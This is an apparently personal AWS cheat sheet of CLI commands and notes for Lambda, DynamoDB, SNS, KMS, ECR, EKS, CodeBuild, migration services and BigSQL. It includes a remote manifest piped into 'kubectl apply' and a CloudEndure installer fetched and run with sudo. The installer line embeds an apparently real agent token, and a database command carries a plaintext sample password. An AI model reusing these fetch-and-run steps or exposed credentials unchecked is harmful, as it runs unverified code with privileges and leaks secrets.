  • Event
    A JSON-formatted message that represents a change in state or occurrence in an application or system
  • Event bus A pipeline that receives events from various sources and routes them to targets based on defined rules
  • Event source The origin of events, which can be AWS services, custom applications, or third-party SaaS providers
  • Event pattern A JSON-based structure that is used in rules to define criteria for matching events
  • Schema A structured definition of an event's format, which can be used for code generation and validation
  • Rule Criteria that are used to match incoming events and determine how they should be processed or routed
  • Archive A feature that makes it possible for you to store events for later analysis or replay
  • Target The destination where matched events are sent, which offers options for event transformation, further processing, and reliable delivery mechanisms, including dead-letter queues
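
minimal rule -> target -> event roundtrip on the default bus ( a sketch; the rule name, source and target ARN are placeholders, and the target, e.g. an SQS queue, must allow events.amazonaws.com in its resource policy )

aws events put-rule --name my-app-rule --event-pattern '{"source":["my.app"]}'
aws events put-targets --rule my-app-rule --targets "Id"="1","Arn"="arn:aws:sqs:eu-central-1:123456789012:MyQueue"
aws events put-events --entries '[{"Source":"my.app","DetailType":"order.created","Detail":"{\"id\":1}"}]'
aws events list-rules --name-prefix my-app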

links


Lambda

  • java - best choice ( price, exec.time ), GraalVM?
  • python - up to ~35x slower than java !!!
  • rust - not for business applications
  • tradeoff: lambda vs k8s(EC2)
aws_service_abbr="lambda"
aws-cli-doc
aws-faq
aws-console

/tmp directory can be used for caching or for sharing data between multiple invocations

list of functions

aws lambda list-functions --function-version ALL --region us-east-1 --output text --query "Functions[?Runtime=='python3.7'].FunctionArn"

remove function

# aws lambda update-function-configuration --function-name my-function --environment "Variables={FIRST=1,SECOND=2}"
# aws lambda list-functions --query 'Functions[].FunctionName'
FUNCTION_NAME=back2ussr-user-get
aws lambda delete-function --function-name $FUNCTION_NAME

examples

API Gateway, Lambda url, remote invocation url

google-chrome https://"$AWS_REGION".console.aws.amazon.com/apigateway/main/apis?region="$AWS_REGION"
# API -> Stages

Lambda function editor, list of all functions

enter point for created Lambdas

google-chrome "https://"$AWS_REGION".console.aws.amazon.com/lambda/home?region="$AWS_REGION"#/functions"

invoke function from CLI, lambda execution

LAMBDA_NAME="function_name"
# example of lambda execution
aws lambda invoke  \
--profile $AWS_PROFILE --region $AWS_REGION \
--function-name $LAMBDA_NAME \
output.log

# example of lambda execution with payload
aws lambda invoke  \
--profile $AWS_PROFILE --region $AWS_REGION \
--function-name $LAMBDA_NAME \
--payload '{"key1": "value-1"}' \
output.log


# example of asynchronic lambda execution with payload
# !!! with SNS downstream execution !!! 
aws lambda invoke  \
--profile $AWS_PROFILE --region $AWS_REGION \
--function-name $LAMBDA_NAME \
--invocation-type Event \
--payload '{"key1": "value-1"}' \
output.log

IAM->Policies->Create policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:*:*:function:*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "logs:CreateLogStream",
                "dynamodb:PutItem",
                "dynamodb:GetItem",
                "logs:PutLogEvents"
            ],
            "Resource": [
                "arn:aws:dynamodb:*:*:table/*",
                "arn:aws:logs:eu-central-1:8557202:log-group:/aws/lambda/function-name-1:*"
            ]
        }
    ]
}

lambda logs, check logs

### lambda all logs
x-www-browser "https://"$AWS_REGION".console.aws.amazon.com/cloudwatch/home?region="$AWS_REGION"#logs:
### lambda part of logs
x-www-browser "https://"$AWS_REGION".console.aws.amazon.com/cloudwatch/home?region="$AWS_REGION"#logStream:group=/aws/lambda/"$LAMBDA_NAME";streamFilter=typeLogStreamPrefix"
  • install plugin: AWS Toolkit,
  • right bottom corner - select Region, select Profile

    profile must have:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "iam:ListRoleTags",
                "iam:GetPolicy",
                "iam:ListRolePolicies"
            ],
            "Resource": [
                "arn:aws:iam::*:policy/*",
                "arn:aws:iam::*:role/*"
            ]
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "iam:ListRoles",
            "Resource": "*"
        },
        {
            "Sid": "VisualEditor2",
            "Effect": "Allow",
            "Action": "iam:PassRole",
            "Resource": "arn:aws:iam::*:role/*"
        },
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}
  • New->Project->AWS
  • create new Python file from template ( my_aws_func.py )
import json
def lambda_handler(event, context):
    return {
        'statusCode': 200,
        'body': json.dumps('Hello from Lambda!')
    }
  • Create Lambda Function, specify handler: my_aws_func.lambda_handler
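
the same handler can also be deployed from the CLI instead of the IDE; a sketch, the role ARN is a placeholder and must be assumable by lambda.amazonaws.com

zip function.zip my_aws_func.py
aws lambda create-function \
  --function-name my-aws-func \
  --runtime python3.9 \
  --handler my_aws_func.lambda_handler \
  --role arn:aws:iam::123456789012:role/lambda-basic-execution \
  --zip-file fileb://function.zip
aws lambda invoke --function-name my-aws-func output.log && cat output.log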

aws sam aws tools for devops

for building serverless applications

# https://docs.aws.amazon.com/serverless-application-model/latest/developerguide/serverless-sam-cli-install.html
pip3 install aws-sam-cli
sam --version

sam cli init
sam deploy --guided
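
typical local loop after init ( assuming docker is running locally for "sam local" )

sam build
sam local invoke              # run the function once in a local container
sam local start-api           # serve the api on http://127.0.0.1:3000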

Python Zappa

virtualenv env
source env/bin/activate
# update your settings https://github.com/Miserlou/Zappa#advanced-settings
zappa init
zappa deploy dev
zappa update dev

DynamoDB

store data in items, not in rows

aws_service_abbr="dynamodb"
aws-cli-doc
aws-faq
aws-console

documentation documentation developer guide dynamodb local run dynamodb query language partiql - sql-like syntax dynamodb via CLI

Keys

  • Partition key ( Type: HASH )
  • Sort key ( Type: Range )
  • Unique key: primary/composite

Secondary Index:

  • local ( < 10Gb )
  • global

Query data:

  • by partition key
  • create secondary index
  • data duplication with target partition key

Scan data:

filter by conditions

Batch operation:

  • get
  • write ( not update )
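
batch write/get example ( a sketch; the table and attribute names below are illustrative and follow the create-table example )

aws dynamodb batch-write-item --request-items '{
  "my_table": [
    {"PutRequest": {"Item": {"column_id": {"N": "10"}, "column_name": {"S": "ten"}}}},
    {"PutRequest": {"Item": {"column_id": {"N": "11"}, "column_name": {"S": "eleven"}}}}
  ]
}'
aws dynamodb batch-get-item --request-items '{
  "my_table": {"Keys": [{"column_id": {"N": "10"}, "column_name": {"S": "ten"}}]}
}'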
# list of tables: https://$AWS_REGION.console.aws.amazon.com/dynamodb/home?region=$AWS_REGION#tables:
aws dynamodb list-tables

TABLE_NAME=my_table
# create table from CLI
aws dynamodb wizard new-table

# create table from CLI
aws dynamodb create-table \
--table-name $TABLE_NAME \
--attribute-definitions \
  AttributeName=column_id,AttributeType=N \
  AttributeName=column_name,AttributeType=S \
--key-schema \
  AttributeName=column_id,KeyType=HASH \
  AttributeName=column_name,KeyType=RANGE \
--billing-mode=PAY_PER_REQUEST \
--region=$AWS_REGION

# describe table 
aws dynamodb describe-table --table-name $TABLE_NAME

# write item, write into DynamoDB
aws dynamodb put-item \
--table-name $TABLE_NAME \
--item '{"column_1":{"N":"1"}, "column_2":{"S":"first record"} }' \
--region=$AWS_REGION \
--return-consumed-capacity TOTAL

# update item 
aws dynamodb update-item \
--table-name $TABLE_NAME \
--key '{"column_1":{"N":"1"}, "column_2":{"S":"first record"} }' \
--update-expression "SET country_name=:new_name" \
--expression-attribute-values '{":new_name":{"S":"first"} }' \
--region=$AWS_REGION \
--return-values ALL_NEW

aws dynamodb update-item --table-name $TABLE_NAME \
--key '{"column_1":{"N":"1"}}' \
--attribute-updates '{"column_1": {"Value": {"N": "1"},"Action": "ADD"}}' \
--return-values ALL_NEW

# select records
aws dynamodb query \
  --table-name $TABLE_NAME \
  --key-condition-expression "column_1 = :id" \
  --expression-attribute-values '{":id":{"N":"1"}}' \
  --region=$AWS_REGION \
  --output=table

aws dynamodb scan --table-name $TABLE_NAME \
--filter-expression "column_1 = :id" \
--expression-attribute-values '{":id":{"N":"1"}}'

# read all items
aws dynamodb scan --table-name $TABLE_NAME

# delete item
aws dynamodb delete-item --table-name $TABLE_NAME --key '{"column_1":{"N":"2"}}'

# delete table
aws dynamodb delete-table --table-name $TABLE_NAME

put_item issue

"Type mismatch for key id expected: N actual: S"

key id must be Numeric

{"id": 10003, "id_value":  "cherkavi_value3"}

Route53

aws_service_abbr="route53"
aws-cli-doc
aws-faq
aws-console
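
listing zones and upserting a record from the CLI ( sketch; the zone id, record name and IP are placeholders )

aws route53 list-hosted-zones --query "HostedZones[].[Id,Name]" --output table
aws route53 change-resource-record-sets --hosted-zone-id Z0123456789ABCDEFGHIJ --change-batch '{
  "Changes": [{
    "Action": "UPSERT",
    "ResourceRecordSet": {
      "Name": "app.example.com",
      "Type": "A",
      "TTL": 300,
      "ResourceRecords": [{"Value": "203.0.113.10"}]
    }
  }]
}'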

Web application environment, application network connection

health check ( light ) - answer from endpoint
health check ( heavy ) - answer from resources behind the application

flowchart LR;
    d[dns] --> r
    r[Route 53] --> 
    lb[load 
       balancer]

    li[listener] --o lb

    tg[target
       group] ---o lb

    tg --> port[port]

    port --o ap[application]

    ap --o i[instance]

    i -.->|w| l[log]

    l --o cw[cloud 
    watch]

    ap <-.->|rw| db[(DB)]

    sm[secret 
       manager] --w-->
    cr[credentials]

    cr --o i

SNS

aws_service_abbr="sns"
aws-cli-doc
aws-faq
aws-console


### list of topics
aws sns list-topics --profile $AWS_PROFILE --region $AWS_REGION
#### open browser with sns dashboard
google-chrome "https://"$AWS_REGION".console.aws.amazon.com/sns/v3/home?region="$AWS_REGION"#/topics"

### list of subscriptions
aws sns list-subscriptions-by-topic --profile $AWS_PROFILE --region $AWS_REGION --topic-arn {topic arn from previous command}

### send example via cli
    #--message file://message.txt
aws sns publish  --profile $AWS_PROFILE --region $AWS_REGION \
    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
    --message "hello from aws cli"

### send message via web 
google-chrome "https://"$AWS_REGION".console.aws.amazon.com/sns/v3/home?region="$AWS_REGION"#/publish/topic/topics/"$AWS_SNS_TOPIC_ARN
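
### create a topic and an e-mail subscription ( sketch; the address is a placeholder, the subscription must be confirmed from the mailbox )
aws sns create-topic --name my-topic --profile $AWS_PROFILE --region $AWS_REGION
aws sns subscribe --profile $AWS_PROFILE --region $AWS_REGION \
    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
    --protocol email --notification-endpoint [email protected]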

CloudWatch

cloud-watch

aws_service_abbr="cloudwatch"
aws-cli-doc
aws-faq
aws-console
 Metrics-----\
              +--->Events------>Alarm
  Logs-------/
+----------------------------------+
        dashboards
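
custom metric, alarm and log tail from the CLI ( sketch; the instance id and SNS topic ARN are placeholders )

aws cloudwatch put-metric-data --namespace "MyApp" --metric-name orders --value 1
aws cloudwatch put-metric-alarm \
  --alarm-name cpu-high \
  --namespace AWS/EC2 --metric-name CPUUtilization \
  --dimensions Name=InstanceId,Value=i-0123456789abcdef0 \
  --statistic Average --period 300 --evaluation-periods 2 \
  --threshold 80 --comparison-operator GreaterThanThreshold \
  --alarm-actions arn:aws:sns:eu-central-1:123456789012:my-topic
# tail a log group ( CLI v2 )
aws logs tail /aws/lambda/$LAMBDA_NAME --follow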

CloudTrail

control/log input/output API calls
can be activated inside VPC
cloud-trail


Kinesis

aws_service_abbr="kinesis"
aws-cli-doc
aws-faq
aws-console

kinesis cli

# write record
aws kinesis put-record --stream-name my_kinesis_stream --partition-key "my_partition_key_1" --data "{'first':'1'}"
# describe stream
aws kinesis describe-stream --stream-name my_kinesis_stream 
# get records
aws kinesis get-shard-iterator --stream-name my_kinesis_stream --shard-id "shardId-000000000" --shard-iterator-type TRIM_HORIZON
aws kinesis get-records --shard-iterator 
# PRODUCER
# CLI v2
aws kinesis put-record --stream-name test --partition-key user1 --data "user signup" --cli-binary-format raw-in-base64-out
# CLI v1
aws kinesis put-record --stream-name test --partition-key user1 --data "user signup"


# CONSUMER 
# describe the stream
aws kinesis describe-stream --stream-name test
# Consume some data
aws kinesis get-shard-iterator --stream-name test --shard-id shardId-000000000000 --shard-iterator-type TRIM_HORIZON
aws kinesis get-records --shard-iterator <>
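
create / remove the stream used above ( sketch )

aws kinesis create-stream --stream-name test --shard-count 1
aws kinesis list-streams
aws kinesis delete-stream --stream-name test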

KMS

aws_service_abbr="kms"
aws-cli-doc
aws-faq
aws-console
# 1) encryption
aws kms encrypt --key-id alias/tutorial --plaintext fileb://ExampleSecretFile.txt --output text --query CiphertextBlob  --region eu-west-2 > ExampleSecretFileEncrypted.base64
# base64 decode
cat ExampleSecretFileEncrypted.base64 | base64 --decode > ExampleSecretFileEncrypted

# 2) decryption
aws kms decrypt --ciphertext-blob fileb://ExampleSecretFileEncrypted --output text --query Plaintext --region eu-west-2 > ExampleFileDecrypted.base64
# base64 decode
cat ExampleFileDecrypted.base64 | base64 --decode > ExampleFileDecrypted.txt

# the same base64 decode on Windows:
certutil -decode .\ExampleFileDecrypted.base64 .\ExampleFileDecrypted.txt
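
creating the key and the alias used above ( sketch )

KEY_ID=$(aws kms create-key --description "tutorial key" --region eu-west-2 --query KeyMetadata.KeyId --output text)
aws kms create-alias --alias-name alias/tutorial --target-key-id $KEY_ID --region eu-west-2
aws kms list-aliases --region eu-west-2 --query "Aliases[].AliasName"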

CloudFormation

aws_service_abbr="cloudformation"
aws-cli-doc
aws-faq
aws-console

# cloudformation designer web
google-chrome "https://"$AWS_REGION".console.aws.amazon.com/cloudformation/designer/home?region="$AWS_REGION
aws cloudformation describe-stacks --region us-east-1
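
deploy / inspect / delete a stack ( sketch; the template and stack names are placeholders )

aws cloudformation deploy --template-file my-template-file.yml --stack-name my-stack --region us-east-1 --capabilities CAPABILITY_NAMED_IAM
aws cloudformation describe-stack-events --stack-name my-stack --region us-east-1
aws cloudformation delete-stack --stack-name my-stack --region us-east-1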

CloudFormation macros

cloud formation macros


OpsWorks

configuration management service that helps you configure and operate applications in a cloud enterprise by using Puppet or Chef.


Security

security links

Sign api request

Threat model


CodeBuild

A fully managed continuous integration service ( to build, test, and package source code )

aws_service_abbr="codebuild"

codebuild start locally

prepare local docker image

git clone https://github.com/aws/aws-codebuild-docker-images.git
cd aws-codebuild-docker-images/ubuntu/standard/7.0/
docker build -t aws/codebuild/standard:7.0 .

download script for local run

# https://github.com/aws/aws-codebuild-docker-images/blob/master/local_builds/codebuild_build.sh
wget https://raw.githubusercontent.com/aws/aws-codebuild-docker-images/master/local_builds/codebuild_build.sh

minimal script

build environment variables

echo 'version: 0.2
phases:
    pre_build:
        commands:
            - echo "script 01.01"
            - echo "script 01.02"
    build:
        commands:
            - echo "script 02.01"
            - echo "script 02.02"
            - echo "script 02.03"
' > buildspec-example.yml

run script

# https://docs.aws.amazon.com/codebuild/latest/userguide/build-env-ref-available.html
/bin/bash codebuild_build.sh \
-i aws/codebuild/standard:7.0 \
-a /tmp/cb \
-b buildspec-example.yml \
-s `pwd` -c -m 

create project

aws codebuild list-projects 

# aws codebuild batch-get-projects --names aws-dockerbuild-push2ecr
aws codebuild create-project --cli-input-json file://codebuild-project.json
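
trigger and inspect a build in the cloud ( sketch; the project name and build id are placeholders )

aws codebuild start-build --project-name my-project
aws codebuild list-builds-for-project --project-name my-project
aws codebuild batch-get-builds --ids my-project:01234567-89ab-cdef-0123-456789abcdef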

EKS Elastic Kubernetes Service

A managed Kubernetes service ( deploy, manage, and scale containerized applications using Kubernetes )

Leader Nodes == Control Plane

aws_service_abbr="eks"

# kubectl setup 
CLUSTER_NAME=my_cluster_name
aws eks update-kubeconfig --region $AWS_REGION --name $CLUSTER_NAME

# list of clusters and nodegroups
for each_cluster in `aws eks list-clusters | jq -r .clusters[]`; do
    echo "cluster: $each_cluster"
    aws eks list-nodegroups --cluster-name $each_cluster
    echo "-------"
done

EKS Cluster

Policies: AmazonEKSClusterPolicy

EKS Node (Group)

Policies mandatory: AmazonEKSWorkerNodePolicy, AmazonEC2ContainerRegistryReadOnly, AmazonEKS_CNI_Policy, AmazonEMRReadOnlyAccessPolicy_v2
Policies not mandatory: CloudWatchAgentServerPolicy

Install CloudWatch agent

ClusterName=$YOUR_CLUSTER_NAME_HERE
RegionName=$YOUR_AWS_REGION_HERE
FluentBitHttpPort='2020'
FluentBitReadFromHead='Off'
FluentBitReadFromTail='On'
FluentBitHttpServer='On'
curl https://raw.githubusercontent.com/aws-samples/amazon-cloudwatch-container-insights/latest/k8s-deployment-manifest-templates/deployment-mode/daemonset/container-insights-monitoring/quickstart/cwagent-fluent-bit-quickstart.yaml | sed 's/{{cluster_name}}/'${ClusterName}'/;s/{{region_name}}/'${RegionName}'/;s/{{http_server_toggle}}/"'${FluentBitHttpServer}'"/;s/{{http_server_port}}/"'${FluentBitHttpPort}'"/;s/{{read_from_head}}/"'${FluentBitReadFromHead}'"/;s/{{read_from_tail}}/"'${FluentBitReadFromTail}'"/' | kubectl apply -f -

typical amount of pods in kube-system

# kubectl get pods -n kube-system
aws-node 
coredns
kube-proxy
metrics-server

ECS Elastic Container Service

ecs
ecs

ECS on Fargate

  1. create docker image
  2. create repository
  aws ecr create-repository --repository-name my-name;    
  aws ecr describe-repositories --query 'repositories[].[repositoryName, repositoryUri]' --output table
  export REPOSITORY_URI=$(aws ecr describe-repositories --query 'repositories[].[repositoryUri]' --output text)
  echo ${REPOSITORY_URI}
  3. docker login
export ACCOUNT_ID=$(aws sts get-caller-identity --output text --query Account)
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
export AWS_REGION=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" -s http://169.254.169.254/latest/dynamic/instance-identity/document | jq -r '.region')
aws ecr get-login-password --region ${AWS_REGION} | docker login --username AWS --password-stdin ${ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com
  4. tag docker image: docker tag my-image:latest ${REPOSITORY_URI}:latest
  5. push docker image: docker push ${REPOSITORY_URI}:latest
    aws ecr describe-images --repository-name my-image
  6. aws ecs create-cluster --cluster-name my-cluster
  7. aws ecs register-task-definition --cli-input-json file://task_definition.json
  8. aws ecs create-service --cli-input-json file://service.json
  9. aws ecs describe-clusters --cluster my-cluster "runningTasksCount": 1

ECR AWS Elastic Container Registry:

A fully managed Docker container registry ( store, manage, and deploy docker images for EKS)

aws_service_abbr="ecr"
aws_ecr_repository_name=udacity-cherkavi
aws ecr create-repository  --repository-name $aws_ecr_repository_name  --region $AWS_REGION
# aws ecr delete-repository --repository-name udacity-cherkavi

# list of all repositories 
aws ecr describe-repositories 

# list of all images in repository
aws ecr list-images  --repository-name $aws_ecr_repository_name 

docker login

# login with account id
AWS_ACCOUNT_ID=`aws sts get-caller-identity --query Account | jq -r . `
docker login -u AWS -p $(aws ecr get-login-password --region ${AWS_REGION}) ${AWS_ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com

# login with aws username/password
aws ecr get-login-password --region ${AWS_REGION} | docker login --username AWS --password-stdin ${AWS_ACCOUNT_ID}.dkr.ecr.${AWS_REGION}.amazonaws.com

# check connection
aws ecr get-authorization-token

docker push local container to ECR

aws_ecr_repository_uri=`aws ecr describe-repositories --repository-names $aws_ecr_repository_name | jq -r '.repositories[0].repositoryUri'`
echo $aws_ecr_repository_uri

docker_image_local=050db1833a9c
docker_image_remote_tag=20230810
docker_image_remote_name=$aws_ecr_repository_uri:$docker_image_remote_tag
docker tag  $docker_image_local $docker_image_remote_name

# push to registry
docker push $docker_image_remote_name

# pull from 
docker pull $docker_image_remote_name

STS Security Token Service

aws_service_abbr="sts"

# get account get user id
aws sts get-caller-identity 
aws sts get-caller-identity --query Account
aws sts get-caller-identity --query UserId
# aws sts get-access-key-info --access-key-id 
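
assume a role and export temporary credentials ( sketch; the role ARN is a placeholder )

CREDS=$(aws sts assume-role \
  --role-arn arn:aws:iam::123456789012:role/my-role \
  --role-session-name my-session \
  --query Credentials --output json)
export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId)
export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey)
export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken)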

Step Functions

logic orchestrator; AWS Glue can be one of the steps ( similar service )


Code Commit

how to clone remote repository

  1. create new profile (aws_profile_in_aws_credentials) in ~/.aws/credentials
  2. execute next commands
git config --global credential.helper '!aws codecommit credential-helper $@'
git config --global credential.UseHttpPath true
AWS_PROFILE=aws_profile_in_aws_credentials
git config --global credential.helper "!aws --profile $AWS_PROFILE codecommit credential-helper $@"
  3. check your settings:
cat ~/.gitconfig
# check the section: 
# [credential]
#         helper = "!aws --profile aws_profile_in_aws_credentials codecommit credential-helper $@"
#         UseHttpPath = true
# !!! should be not like:
# helper = "aws s3 ls --profile aws_profile_in_aws_credentials codecommit credential-helper "

# fix it otherwise
git config --global --edit 
  4. clone your repo with https
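
example of the https clone url ( region and repository name are placeholders ):

git clone https://git-codecommit.eu-central-1.amazonaws.com/v1/repos/my-repository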

Code Build

flowchart RL;
    subgraph buildtime
        pr[project] --o cb[Code Build]
        r[role] --o pr
        pl[policy] --o r
        s3[s3] --o pr

        git[git 
            repo] -.->|w| pr

        pr -.-> 
        i[container 
        image]

        i --o ecr[ECR]

        i -.-> d[deployment]
    end

    subgraph runtime
        p[pod] --o n[node]

        n --o 
        ng[node 
           group]

        ng --o eks
        c[Cluster] --o eks[EKS]
    end

    d ----|service| p


seed-farmer: orchestration tool ( documentation )

pip install seed-farmer

in case of issue:

AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
pip3 install pyOpenSSL --upgrade


Cognito

authentication, authorization, user pool, identity pool


run containers as Lambda functions


Shield

shield


Firewall

firewall


Launch Template

flowchart LR;
    lt[Launch 
       Template] --o 
    as[Auto
    Scaling]

Launch Configuration

flowchart LR;
    lt[Launch 
       Configuration] --o 
    as[Auto
    Scaling]

Glue

Extract Transform Load see: Data Pipeline

flowchart LR;

s[source] -.-> gc[Glue Crawler] -.-> gdc[Glue  Data Catalog] -.-> etl[ETL jobs] -.-> d[dest]

rds[RDS] --extend--> s
S3 --extend--> d
rds ~~~ d
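
inspecting the Data Catalog and starting a crawler/job from the CLI ( sketch; database, crawler and job names are placeholders )

aws glue get-databases --query "DatabaseList[].Name"
aws glue get-tables --database-name my_database --query "TableList[].Name"
aws glue start-crawler --name my-crawler
aws glue start-job-run --job-name my-etl-job
aws glue get-job-runs --job-name my-etl-job --query "JobRuns[0].JobRunState"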

Amazon X-Ray

http header for tracing: x-amzn-trace-id


cloud9


Code Services

  • source
    • code repository
    • vscode: aws toolkits, amazon q
  • build
    • codePipeline
      • codeguru
      • codebuild
      • codeartifacts
  • deploy
    • codedeploy
  • monitor
    • X-Ray

QuickSight


cloudsearch


ElasticSearch


personal health dashboard


app sync


FIS - Fault Injection Service

stress an application by creating disruptive events so that you can observe how your application responds ( chaos engineering ).


examples



upcoming courses todo

evaluate->make plans->test plans->reformat plan->test plan->performing

business point of view

  • function by function
  • component by component

collaboration of external maintenance/migration team with "on-site"

  • Factory - external team producing components or functions for customer
  • Assisted - people assigned to project and working in parallel with customer
  • Camps - specific groups (each group based on focus) of people are waiting for serving customer requests

planning and milestones

  • rehost ( one-to-one )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • replatform (one-to-one with optimization, replace with existing AWS services )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Evaluate appropriate service replacements
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • repurchase ( using AWS services + AWS Marketplace with configured machines )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Evaluate appropriate service replacements
    • Analyze migration services
    • Identify migration plan
    • Purchase necessary software/components
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • refactor reachitect ( what should be re-architected -> SOA )
    • Specify Migration Goals
    • Identify data to migrate
    • Discover components to migrate
    • Evaluate appropriate service replacements
    • Identify appropriate architecture
    • Analyze migration services
    • Identify migration plan
    • Build test architecture
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • retire ( what may not be migrated )
    • Specify Migration Goals
    • Identify data to migrate
    • Identify unnecessary components
    • Discover components to migrate
    • Retire unnecessary components
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test
  • retain ( not ready, not necessary to migrate )
    • Specify Migration Goals
    • Identify data to migrate
    • Identify best environment for each component
    • Analyze migration services
    • Identify migration plan
    • Setup cross-environment connectivity
    • Test components and application functionality
    • Backup data and application
    • Replicate application data
    • Migrate application components
    • Test

Requirements

  • Platform review and considerations
  • Key parameters of new environment
  • Can the app afford downtime, and for how long?
  • Data migration - now or later ?

Network limitation

^ |------------------------------|------------|
T | DirectConnect/StorageGateway | Snowmobile |
i |------------------------------|------------|
m | transfer to S3 directly      | Snowball   |
e |------------------------------|------------|
                      size of data --->

AWS Server Migration Service

requirements

  • available for: VMware vSphere, Microsoft Hyper-V, Azure VM
  • replicate to AmazonMachineImages ( EC2 )
  • using connector - BSDVM that you should install into your environment

AWS Migration Hub

  • Amazon CloudEndure,
  • AWS ServerMigrationService
  • AWS DatabaseMigrationService
  • Application Discovery Service
  • Application Discovery Agents

Application Discovery Service

perform discovery and collect data

  • agentless ( working with VMware vCenter )
  • agent-based ( collecting processes into VM and exists network connections )

Migration steps

  • Discover current infrastructure
  • Experiment with services and copy of data
  • Iterate with another experiment ( using other services )
  • Deploying to AWS

Percona XtraBackup

installation

wget https://repo.percona.com/apt/percona-release_latest.$(lsb_release -sc)_all.deb
sudo dpkg -i percona-release_latest.$(lsb_release -sc)_all.deb
sudo apt-get update
# MySQL 5.6, 5.7; for MySQL 8.0 - XtraBackup 8.0
sudo apt-get -y install percona-xtrabackup-24

create backup

sudo xtrabackup --backup --stream=tar --user=my_user --password=my_password | gzip -c > /home/ubuntu/xtrabackup.tar.gz

list of policies for role

AWSApplicationDiscoveryAgentAccess
AmazonS3FullAccess
AWSCloud9Administrator
RDS-Policy
CF-Policy
IAM-Policy

create new instance with db

aws rds restore-db-instance-from-s3  --db-instance-identifier ghost-db-mysql --db-instance-class db.t2.large  --engine mysql  --source-engine mysql  --source-engine-version 5.7.22  --s3-bucket-name <FMI>  --s3-ingestion-role-arn "<FMI>"  --allocated-storage 100 --master-username admin  --master-user-password foobarfoobar --region <FMI>

check status

aws rds describe-db-instances --db-instance-identifier ghost-db-mysql --region <FMI> --query DBInstances[0].DBInstanceStatus

Database migration service

  • create replication instance
  • create source endpoint
  • create target endpoint
  • create database migration task
  • registration, get free migration license
  • IAM policy
  • Create user IAM user
  • CloudEndure->select source and destination regions
  • CloudEndure->Setup & Info->write down AccessKeyId & SecretAccessKey
  • CloudEndure->Machines How to Add Machines
  • Install agent on EC2 instance
    wget -O ./installer_linux.py https://console.cloudendure.com/installer_linux.py
    sudo python ./installer_linux.py -t 0B7F-A786-6F8F-0727-08E2-0CB1-B758-7E41-4D03-7A47-8C2A-129A-8CFE-B115-09EA-A1EC --no-prompt
  • CloudEndure->LaunchTargetMachines->TestMode ( check JobProgress )
  • EC2 instance list
  • check ip addresses in new EC2

Secret Manager

secrets store
pay attention to Parameter Store

Systems Manager Parameter Store

Primarily used for storing configuration data and parameters ( database connection strings, passwords, license codes )

DataSets cheat sheet

BigSQL cheat sheet

overview how to run query

Warehouse

default directory (/special-folder/hive/warehouse) in HDFS to store tables

Schema

directory (/special-folder/hive/warehouse/user-personal-schema) to store tables ( can be organized in schema )

Table

directory (/special-folder/hive/warehouse/user-personal-schema/my-table-01) with zero or more files

Partitions

additional sub-directory to save special data for the table

/special-folder/hive/warehouse/user-personal-schema/my-table-01/my-column-country=USA
/special-folder/hive/warehouse/user-personal-schema/my-table-01/my-column-country=GERMANY

commands

bigsql/bin start
bigsql/bin stop
bigsql/bin status

configuration

bigsql-conf.xml

switch on compatibility mode

use Big SQL 1.0 syntax in Big SQL

set syshadoop.compatability_mode=1;

Data types

compare data types

  • Declared type
  • SQL type
  • Hive type

using strings

  • avoid using string - default size is 32k
  • change default string length:
set hadoop property bigsql.string.size=128
  • use VARCHAR instead of STRING

datetime ( not date !!! )

2003-12-23 00:00:00.0

boolean

boolean workaround

create schema

create schema "my_schema";
use "my_schema"
drop schema "my_schema" cascade;

create table ( @see hive.md )

create hadoop table IF NOT EXISTS my_table_into_my_schema ( col1 int not null primary key, col2 varchar(50)) 
row format delimited 
fields terminated by ',' 
LINES TERMINATED by '\n'
escaped BY '\\'
null defined as '%THIS_IS_NULL%'
stored as [<empty> | TEXT | BINARY] SEQUENCEFILE;
-- PARQUETFILE
-- ORC
-- RCFILE
-- TEXTFILE

avro table creation: avro table

insert

  • insert values (not to use for prod) - each command will create its personal file with records
insert into my_table_into_my_schema values (1,'first'), (2,'second'), (3,'third');
  • file insert - copy file into appropriate folder ( with delimiter between columns )
call syshadoop.hcat_cache_sync('my_schema', 'my_table_into_my_schema');
  • create table based on select
CREATE HADOOP TABLE new_my_table STORED AS PARQUETFILE AS SELECT * FROM my_table_into_my_schema;
  • load data
LOAD HADOOP USING FILE URL 'sftp://my_host:22/sub-folder/file1' 
WITH SOURCE PROPERTIES ('field.delimiter' = '|')
INTO TABLE my_table_into_my_schema APPEND;

null value

  • BigSQL 1.0 - ''
  • BigSQL - \N
  • can be specified as part of table creation
NULL DEFINED AS 'null_representation'

JSqsh

